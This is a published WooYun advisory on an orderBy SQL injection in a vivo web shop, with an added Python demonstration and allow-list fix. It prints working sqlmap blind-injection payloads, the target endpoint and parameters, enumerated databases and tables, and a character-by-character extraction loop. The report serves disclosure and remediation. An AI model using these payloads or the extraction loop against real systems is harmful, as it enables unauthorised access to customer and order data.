Vulnerability summary

Defect ID: wooyun-2015-0130324

Title: Mobile-industry security: SQL injection on a vivo smartphone site (DBA privileges)

Vendor: vivo智能手机 (vivo smartphones)

Author: 路人甲

Submitted: 2015-07-29 22:52

Fixed: 2015-09-16 11:34

Published: 2015-09-16 11:34

Type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Vulnerability details

Disclosure status:

2015-07-29: Details sent to the vendor, awaiting vendor handling
2015-08-02: Vendor confirmed; details visible to the vendor only
2015-08-12: Details disclosed to core white hats and relevant domain experts
2015-08-22: Details disclosed to regular white hats
2015-09-01: Details disclosed to intern white hats
2015-09-16: Details disclosed to the public

Brief description:

As the title says.

Details:

http://shop.vivo.com.cn/gallery-ajax_get_goods.html
POST parameters (the asterisk in orderBy=* is sqlmap's custom injection marker, which is why the output below reports the parameter as #1* ((custom) POST)):
cat_id=&orderBy=*&scontent=n,e&showtype=grid&&virtual_cat_id=
The orderBy parameter is injectable.


Proof of vulnerability:

sqlmap identified the following injection points with a total of 522 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0
current user: 'vivo@192.168.1.%'
current database: 'vivo_store'
current user is DBA: True
available databases [8]:
[*] cacti
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] vivo04e9
[*] vivo_chk
Second sqlmap run, resumed from the saved session (0 new HTTP requests) with the same two injection points as above, enumerating the tables of the current database:
Database: vivo_store
[182 tables]
+-----------------------------------------+
| sdb_aftersales_return_product |
| sdb_apiactionlog_apilog |
| sdb_b2c_archive_orders |
| sdb_b2c_brand |
| sdb_b2c_cart |
| sdb_b2c_cart_objects |
| sdb_b2c_college |
| sdb_b2c_comment_goods_point |
| sdb_b2c_comment_goods_type |
| sdb_b2c_contract_package |
| sdb_b2c_contract_package_numbers |
| sdb_b2c_counter |
| sdb_b2c_counter_attach |
| sdb_b2c_coupon_map |
| sdb_b2c_coupon_vivo |
| sdb_b2c_coupon_vivo_info |
| sdb_b2c_coupon_vivo_list |
| sdb_b2c_coupon_vivo_xshot |
| sdb_b2c_coupons |
| sdb_b2c_delivery |
| sdb_b2c_delivery_items |
| sdb_b2c_dly_h_area |
| sdb_b2c_dlycorp |
| sdb_b2c_dlytype |
| sdb_b2c_flashlottery_award |
| sdb_b2c_flashlottery_log |
| sdb_b2c_flashlottery_winner |
| sdb_b2c_goods |
| sdb_b2c_goods_cat |
| sdb_b2c_goods_contract_package |
| sdb_b2c_goods_keywords |
| sdb_b2c_goods_lv_price |
| sdb_b2c_goods_promotion_ref |
| sdb_b2c_goods_question |
| sdb_b2c_goods_rate |
| sdb_b2c_goods_spec_index |
| sdb_b2c_goods_store_prompt |
| sdb_b2c_goods_type |
| sdb_b2c_goods_type_props |
| sdb_b2c_goods_type_props_value |
| sdb_b2c_goods_type_spec |
| sdb_b2c_goods_virtual_cat |
| sdb_b2c_lottery_award |
| sdb_b2c_lottery_log |
| sdb_b2c_lottery_winner |
| sdb_b2c_member_addrs |
| sdb_b2c_member_advance |
| sdb_b2c_member_college |
| sdb_b2c_member_comments |
| sdb_b2c_member_coupon |
| sdb_b2c_member_goods |
| sdb_b2c_member_limit_ip |
| sdb_b2c_member_lv |
| sdb_b2c_member_msg |
| sdb_b2c_member_point |
| sdb_b2c_member_pwdlog |
| sdb_b2c_member_secret |
| sdb_b2c_member_share_history |
| sdb_b2c_member_systmpl |
| sdb_b2c_members |
| sdb_b2c_order_coupon_user |
| sdb_b2c_order_delivery |
| sdb_b2c_order_items |
| sdb_b2c_order_log |
| sdb_b2c_order_objects |
| sdb_b2c_order_pmt |
| sdb_b2c_orders |
| sdb_b2c_preorders_sales_rule |
| sdb_b2c_products |
| sdb_b2c_reship |
| sdb_b2c_reship_items |
| sdb_b2c_sales_rule_goods |
| sdb_b2c_sales_rule_order |
| sdb_b2c_sell_logs |
| sdb_b2c_shop |
| sdb_b2c_spec_values |
| sdb_b2c_specification |
| sdb_b2c_type_brand |
| sdb_b2c_xfive_coupon_log |
| sdb_b2c_xfiveblue_preorder |
| sdb_b2c_xfivepro_preorder |
| sdb_base_app_content |
| sdb_base_apps |
| sdb_base_cache_expires |
| sdb_base_crontab |
| sdb_base_files |
| sdb_base_kvstore |
| sdb_base_network |
| sdb_base_queue |
| sdb_base_rpcnotify |
| sdb_base_rpcpoll |
| sdb_base_syscache_resources |
| sdb_content_article_bodys |
| sdb_content_article_indexs |
| sdb_content_article_nodes |
| sdb_couponlog_order_coupon_ref |
| sdb_couponlog_order_coupon_user |
| sdb_dbeav_meta_register |
| sdb_dbeav_meta_value_datetime |
| sdb_dbeav_meta_value_decimal |
| sdb_dbeav_meta_value_int |
| sdb_dbeav_meta_value_longtext |
| sdb_dbeav_meta_value_text |
| sdb_dbeav_meta_value_varchar |
| sdb_dbeav_recycle |
| sdb_desktop_filter |
| sdb_desktop_flow |
| sdb_desktop_hasrole |
| sdb_desktop_menus |
| sdb_desktop_recycle |
| sdb_desktop_role_flow |
| sdb_desktop_roles |
| sdb_desktop_tag |
| sdb_desktop_tag_rel |
| sdb_desktop_user_flow |
| sdb_desktop_users |
| sdb_ectools_analysis |
| sdb_ectools_analysis_logs |
| sdb_ectools_currency |
| sdb_ectools_order_bills |
| sdb_ectools_payments |
| sdb_ectools_payments_log_callback |
| sdb_ectools_payments_log_request |
| sdb_ectools_refunds |
| sdb_ectools_regions |
| sdb_express_dly_center |
| sdb_express_print_tmpl |
| sdb_gift_cat |
| sdb_gift_ref |
| sdb_image_image |
| sdb_image_image_attach |
| sdb_importexport_task |
| sdb_logisticstrack_logistic_log |
| sdb_operatorlog_logs |
| sdb_operatorlog_normallogs |
| sdb_operatorlog_register |
| sdb_pam_account |
| sdb_pam_auth |
| sdb_pam_bind_tag |
| sdb_pam_log |
| sdb_pointprofessional_member_point_task |
| sdb_preorderlog_order_preorder_user |
| sdb_site_activities_survey |
| sdb_site_activities_xfivepro |
| sdb_site_explorers |
| sdb_site_index_page |
| sdb_site_link |
| sdb_site_lucky_draw |
| sdb_site_menus |
| sdb_site_modules |
| sdb_site_purchase |
| sdb_site_route_statics |
| sdb_site_seo |
| sdb_site_themes |
| sdb_site_themes_file |
| sdb_site_themes_tmpl |
| sdb_site_widgets |
| sdb_site_widgets_instance |
| sdb_site_widgets_proinstance |
| sdb_system_matrixset |
| sdb_system_queue_mysql |
| sdb_timedbuy_objitems |
| sdb_upimage_upimage |
| sdb_wap_explorers |
| sdb_wap_menus |
| sdb_wap_modules |
| sdb_wap_seo |
| sdb_wap_themes |
| sdb_wap_themes_file |
| sdb_wap_themes_tmpl |
| sdb_wap_widgets |
| sdb_wap_widgets_instance |
| sdb_weixin_alert |
| sdb_weixin_bind |
| sdb_weixin_menus |
| sdb_weixin_message |
| sdb_weixin_message_image |
| sdb_weixin_message_text |
| sdb_weixin_safeguard |
| tmp_53aa3e378d690 |
| tmp_53bbb6d760ad5 |
| tmp_53bbc08212460 |
+-----------------------------------------+

Suggested fix:

Filter the parameter.

Copyright: please credit 路人甲@乌云 (WooYun) when reposting.
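The report shows the mechanics only through sqlmap's output. The following is an added example, written for this page and not code from the vivo shop or from the original report, that reproduces the two things the report relies on: an ORDER BY clause built by string concatenation (the "Details" section) and the allow-list fix that "filter the parameter" should mean in practice (the "Suggested fix" section). It uses Python with an in-memory SQLite database and a constructed goods table; the real PHP code, schema and column names are not on the page and are assumptions. sqlmap's MySQL payload above forces an error in the ELSE branch via a multi-row subquery against INFORMATION_SCHEMA.CHARACTER_SETS; SQLite does not raise on that, so this example uses the result ordering itself as the true/false side channel, which is a standard ORDER BY inference technique rather than the exact payload sqlmap sent.

```python
import sqlite3

# Constructed sample catalogue standing in for the goods table behind
# gallery-ajax_get_goods.html; the real schema is not on the page (assumption).
ROWS = [
    (1, "X5 Pro", 2698.0),
    (2, "Xshot", 2498.0),
    (3, "Y27", 1298.0),
    (4, "X5 Max", 2998.0),
]


def _conn() -> sqlite3.Connection:
    c = sqlite3.connect(":memory:")
    c.execute("CREATE TABLE goods (goods_id INTEGER, name TEXT, price REAL)")
    c.executemany("INSERT INTO goods VALUES (?, ?, ?)", ROWS)
    return c


def vulnerable_gallery(order_by: str) -> list:
    """Mirrors the reported flaw: the orderBy value is pasted into the SQL text.
    Returns goods_ids in the order the database produced them."""
    sql = "SELECT goods_id FROM goods ORDER BY " + order_by
    return [row[0] for row in _conn().execute(sql)]


def blind_infer(condition: str) -> bool:
    """Boolean oracle through the ORDER BY channel: a true condition sorts the
    listing by price, a false one by goods_id, and the attacker reads the
    answer from which order comes back. (sqlmap's payload on the page uses an
    error in the ELSE branch instead; SQLite tolerates that, so sort order is
    the side channel here - assumption.)"""
    by_price = [r[0] for r in sorted(ROWS, key=lambda r: r[2])]
    payload = f"(CASE WHEN ({condition}) THEN price ELSE goods_id END)"
    return vulnerable_gallery(payload) == by_price


CHARSET = "abcdefghijklmnopqrstuvwxyz_0123456789"


def extract_first_table(max_len: int = 32) -> str:
    """Recovers the first table name one character at a time using only the
    true/false oracle; this is the loop sqlmap automates to read 'current
    user', 'current database' and the table list shown in the report."""
    target = "(SELECT name FROM sqlite_master WHERE type='table' LIMIT 1)"
    name = ""
    for pos in range(1, max_len + 1):
        if not blind_infer(f"length({target}) >= {pos}"):
            break
        for ch in CHARSET:
            if blind_infer(f"substr({target}, {pos}, 1) = '{ch}'"):
                name += ch
                break
    return name


# Hardened form: ORDER BY takes an identifier, which cannot be bound as a
# prepared-statement parameter, so map the user's value onto a fixed
# allow-list instead of trying to filter characters out of it.
ALLOWED_ORDER = {
    "price_asc": "price ASC",
    "price_desc": "price DESC",
    "name": "name ASC",
}


def is_allowed_order(order_by: str) -> bool:
    return order_by in ALLOWED_ORDER


def hardened_gallery(order_by: str) -> list:
    if not is_allowed_order(order_by):
        raise ValueError("unsupported orderBy value")
    sql = "SELECT goods_id FROM goods ORDER BY " + ALLOWED_ORDER[order_by]
    return [row[0] for row in _conn().execute(sql)]


if __name__ == "__main__":
    print(vulnerable_gallery("(CASE WHEN (1=1) THEN price ELSE goods_id END)"))
    print(blind_infer("1=1"), blind_infer("1=2"))
    print(extract_first_table())
    print(hardened_gallery("price_desc"))
```

Two points the sqlmap output makes that the fix line does not: the web account 'vivo@192.168.1.%' is reported as DBA, and the listing shows seven other databases (cacti, mysql, seckill, vivo_chk and so on) reachable from the shop's connection. An allow-list on orderBy closes this entry point, but the same query bug elsewhere would again expose everything that account can read, so a least-privilege database account scoped to vivo_store belongs in the remediation alongside the input fix.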


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-08-02 11:33

Vendor reply:

Thanks for your attention.

Latest status:

None yet

